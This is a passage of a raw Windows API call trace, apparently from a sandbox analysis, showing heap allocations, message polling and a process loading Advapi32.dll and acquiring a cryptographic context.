Flags=0x0, Size=0xc) returned 0x2e516b8 [0263.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.121] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0263.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0263.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0263.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0263.122] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0263.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0263.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0263.123] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0263.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0263.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.124] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0263.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.124] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0263.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.124] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.126] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0263.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.126] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0263.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0263.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.127] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0263.127] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0263.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0263.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0263.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0263.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.128] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0263.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0263.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0263.147] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0263.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0263.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0263.148] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.148] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0263.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.148] RtlAllocateHeap (HeapHandle=0x970000, 